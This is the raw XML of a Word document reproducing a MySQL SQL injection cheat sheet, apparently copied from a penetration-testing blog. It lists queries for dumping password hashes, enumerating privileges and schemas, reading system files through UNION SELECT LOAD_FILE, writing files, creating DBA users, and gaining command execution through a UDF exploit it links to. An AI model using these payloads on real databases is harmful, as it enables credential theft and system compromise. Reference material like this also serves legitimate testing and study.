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F2" w:rsidRPr="00ED13F2" w:rsidRDefault="00ED13F2" w:rsidP="00ED13F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1373A"/>
          <w:kern w:val="36"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="31373A"/>
          <w:kern w:val="36"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="31373A"/>
          <w:kern w:val="36"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection Cheat Sheet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED13F2" w:rsidRPr="00ED13F2" w:rsidRDefault="00ED13F2" w:rsidP="00ED13F2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ED13F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4C5356"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Some useful syntax reminders for SQL Injection into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4C5356"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4C5356"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> databases…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED13F2" w:rsidRPr="00ED13F2" w:rsidRDefault="00ED13F2" w:rsidP="00ED13F2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ED13F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4C5356"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">This post is part of a series of SQL Injection Cheat Sheets.  In this series, I’ve </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4C5356"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>endevoured</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4C5356"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> to tabulate the data to make it easier to read and to use the same table for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4C5356"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4C5356"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> each database backend.  This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D7B84" w:rsidRDefault="000D7B84" w:rsidP="00ED13F2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</w:p>
    <w:p w:rsidR="00ED13F2" w:rsidRPr="00ED13F2" w:rsidRDefault="00ED13F2" w:rsidP="00ED13F2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ED13F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4C5356"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>I’m not planning to write one for MS Access, but there’s a great</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4C5356"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00ED13F2">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0099BB"/>
            <w:sz w:val="26"/>
          </w:rPr>
          <w:t>MS Access Cheat Sheet here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00ED13F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4C5356"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED13F2" w:rsidRDefault="00ED13F2" w:rsidP="00ED13F2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  <w:r w:rsidRPr="00ED13F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4C5356"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Some of the queries in the table below can only be run by an admin. These are marked with “– </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4C5356"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4C5356"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>” at the end of the query.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D7B84" w:rsidRPr="00ED13F2" w:rsidRDefault="000D7B84" w:rsidP="00ED13F2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4C5356"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8388" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="E7E7E7"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="E7E7E7"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E7E7E7"/>
          <w:right w:val="single" w:sz="4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2179"/>
        <w:gridCol w:w="6209"/>
      </w:tblGrid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@@version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1; #comment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/*comment*/1;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Current User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user();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system_user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List Users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user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mysql.user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List Password Hashes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host, user, password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mysql.user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Cracker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D13F2">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="0099BB"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>John the Ripper</w:t>
              </w:r>
            </w:hyperlink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will crack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hashes.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List Privileges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grantee,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privilege_type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is_grantable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information_schema.user_privileges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— list user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privsSELECT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host, user,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Insert_priv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Update_priv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Delete_priv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Create_priv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Drop_priv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Reload_priv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Shutdown_priv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Process_priv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File_priv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Grant_priv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Index_priv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Alter_priv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Show_db_priv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Super_priv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Create_tmp_table_priv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Lock_tables_priv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Execute_priv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Repl_slave_priv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Repl_client_priv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mysql.user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list user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privsSELECT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grantee,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privilege_type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information_schema.schema_privileges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— list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databases (schemas)SELECT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privilege_type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information_schema.column_privileges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— list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columns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DBA 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Accounts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SELECT grantee,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privilege_type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is_grantable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information_schema.user_privileges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privilege_type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‘SUPER’;SELECT host, user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mysql.user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Super_priv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‘Y’; #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Current Database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database()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List Databases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schema_name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information_schema.schemata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— for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v5.0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distinct(db)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mysql.db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List Columns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information_schema.columns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‘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AND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‘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List Tables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table_schema,table_name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information_schema.tables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‘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AND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‘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Find Tables From Column Name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information_schema.columns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‘username’; — find table which have a column called ‘username’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Nth Row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host,user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user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0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host,user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user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0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Nth Char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(‘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abcd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’, 3, 1); # returns c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6 &amp; 2; # returns 2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6 &amp; 1; # returns 0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ASCII Value -&gt; Char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char(65); # returns A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Char -&gt; ASCII Value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ascii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(‘A’); # returns 65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Casting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cast(’1′ AS unsigned integer);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cast(’123′ AS char);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Concatenation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CONCAT(‘A’,'B’); #returns AB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CONCAT(‘A’,'B’,'C’); # returns ABC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If Statement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if(1=1,’foo’,'bar’); — returns ‘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foo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Case Statement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CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A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Avoiding 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Quotes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0×414243; # returns ABC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 Delay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SELECT BENCHMARK(1000000,MD5(‘A’));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  <w:t>SELECT SLEEP(5); # &gt;= 5.0.12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Make DNS Requests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Impossible?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Command Execution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mysqld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(&lt;5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /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/lib (or similar).  The .so file should contain a User Defined Function (UDF).  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"http://www.0xdeadbeef.info/exploits/raptor_udf.c" </w:instrTex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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00ED13F2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="0099BB"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>raptor_udf.c</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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 explains exactly how you go about this.  Remember to compile for the target architecture which may or may not be the same as your attack platform.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 Access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…’ UNION ALL SELECT LOAD_</w:t>
            </w:r>
            <w:proofErr w:type="gram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FILE(</w:t>
            </w:r>
            <w:proofErr w:type="gram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‘/etc/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’)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, can only read world-readable files.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* FROM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mytable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dumpfile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‘/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somefile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’;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, write to file system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Hostname, IP Address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@@hostname;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USER test1 IDENTIFIED BY ‘pass1′;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Delete Users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USER test1;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Make User DBA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GRANT ALL PRIVILEGES ON *.* TO test1@’%'; —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priv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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DB files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SELECT @@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datadir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D13F2" w:rsidRPr="00ED13F2" w:rsidTr="00ED13F2"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Default/System Databases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4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288" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00ED13F2" w:rsidRPr="00ED13F2" w:rsidRDefault="00ED13F2" w:rsidP="00ED1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information_schema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(&gt;= </w:t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5.0)</w:t>
            </w:r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13F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</w:tbl>
    <w:p w:rsidR="00664EAE" w:rsidRDefault="00664EAE"/>
    <w:sectPr w:rsidR="00664EAE" w:rsidSect="0066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7DAA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="651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3F2"/>
    <w:rsid w:val="000D7B84"/>
    <w:rsid w:val="00664EAE"/>
    <w:rsid w:val="00ED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EAE"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00ED1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3F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13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wall.com/john/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nibblesec.org/files/MSAccessSQLi/MSAccessSQL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3870</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>32</Lines>
  <Paragraphs>9</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Automatic Data Processing, Inc.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davisdh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>davisdh</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-09-18T20:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-09-18T20:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>